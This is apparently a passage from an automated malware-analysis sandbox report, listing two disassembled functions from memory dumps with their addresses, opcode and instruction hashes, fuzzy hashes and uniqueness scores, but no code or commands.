                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 010FD44B, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: 079f76eb5099d8e95398e3fbe363bdedc08def69b96ca4901c4238a53abfa4e0
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 0711AFB6404280DFDB12CF54D5C4B16BFB2FB84324F2486ADD9450B656C336D45ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0110D017, Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918647537.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction ID: 62fd59b73b3ba52dfba6c4f1b7f1253e7c5ddd2b5c1f82840c2b64b61e36f268
                                                                                                                • Opcode Fuzzy Hash: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction Fuzzy Hash: A811EE75904280CFCB06CF54E5C0B15BB62FB44324F24C6A9D8094B69AC37AD40ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions